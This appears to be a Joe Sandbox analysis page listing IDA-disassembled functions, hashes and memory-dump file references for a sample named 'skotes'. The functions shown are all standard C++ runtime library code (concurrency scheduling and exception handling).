Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: 27405feab443d505288a23d0dac02228d7feea00d7228c0d191230cc7f51c8b4
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: D1514875A00209ABDF08DFA4C595BEDB3A8BF48344F1541A9E915EB682DB30AE45CBD0

Function 009752A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 009753A0
type_info::operator==.LIBVCRUNTIME ref: 009753C7
___TypeMatch.LIBVCRUNTIME ref: 009754D3
IsInExceptionSpec.LIBVCRUNTIME ref: 009755AE
CallUnexpected.LIBVCRUNTIME ref: 00975650

Strings

csm, xrefs: 009752E0
csm, xrefs: 0097534D
csm, xrefs: 009753FE

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: 941582f68ba3a8844f340905d6c01fbf8e4f7051668c0143d27718a2b595fe91
Instruction ID: 946235735035a8d9ad0ee4ee06dd9d8eaf6a5f618cfe03634495c2c3609f6ed2
Opcode Fuzzy Hash: 941582f68ba3a8844f340905d6c01fbf8e4f7051668c0143d27718a2b595fe91
Instruction Fuzzy Hash: F4C1BB72900609EFCF55DFA4C880AAEBBB9FF54310F46C15AF8096B212D7B1DA51CB91

Function 00967364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 009673B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 009673F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0096740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00967419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00967440

Strings

ppVirtualProcessorRoots, xrefs: 00967438
count, xrefs: 0096737E

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 963cbd22adb45234d470f370a44f540adc9f78d62095a55f60852da0ffb7e717
Instruction ID: c285de85c96bd02e9f8fad0d8326934bb99f43405190ad39337ca69fe4066975
Opcode Fuzzy Hash: 963cbd22adb45234d470f370a44f540adc9f78d62095a55f60852da0ffb7e717
Instruction Fuzzy Hash: 36216534A04309AFCF14EFA9D495ABDBBB9BF45314F144069E815973A1DB30AE04DF90

Function 009678E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00967903

Part of subcall function 00965CB8: __EH_prolog3_catch.LIBCMT ref: 00965CBF
Part of subcall function 00965CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00965CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0096792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00967936

Part of subcall function 00965CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00965D70
Part of subcall function 00965CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00965D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00967982
Concurrency::location::_Assign.LIBCMT ref: 009679A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 009679AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 009679BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 009679ED

Part of subcall function 0096691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00966942
Part of subcall function 0096691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00966965

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 19aac2ea1bfe080721a692789ba5d38fd52cafe903b7e6590eca9e3593c19dd2
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 90312730B082566ADF16AAB844927FEF7F99F91708F0405A9D885D7242DB284D49C791

Function 00974840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00974877
___except_validate_context_record.LIBVCRUNTIME ref: 0097487F
_ValidateLocalCookies.LIBCMT ref: 00974908
__IsNonwritableInCurrentImage.LIBCMT ref: 00974933
_ValidateLocalCookies.LIBCMT ref: 00974988

Strings

csm, xrefs: 0097491D

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bc845ed3d62a4f7129f337d27febd3301c83135bd095480028ee78d057910b22
Instruction ID: 1500fc6bd2feb79cd1ed5112685434a66e5ad3d1a29151558df03089202f4380
Opcode Fuzzy Hash: bc845ed3d62a4f7129f337d27febd3301c83135bd095480028ee78d057910b22
Instruction Fuzzy Hash: 1E41B335A00219EBCF10EF68C885B9EBBB8AF85718F14C155E92C5B3A3D7719A11CB91

Function 0096DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0096DD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0096DDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0096DE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0096DE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0096DE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0096DE4B
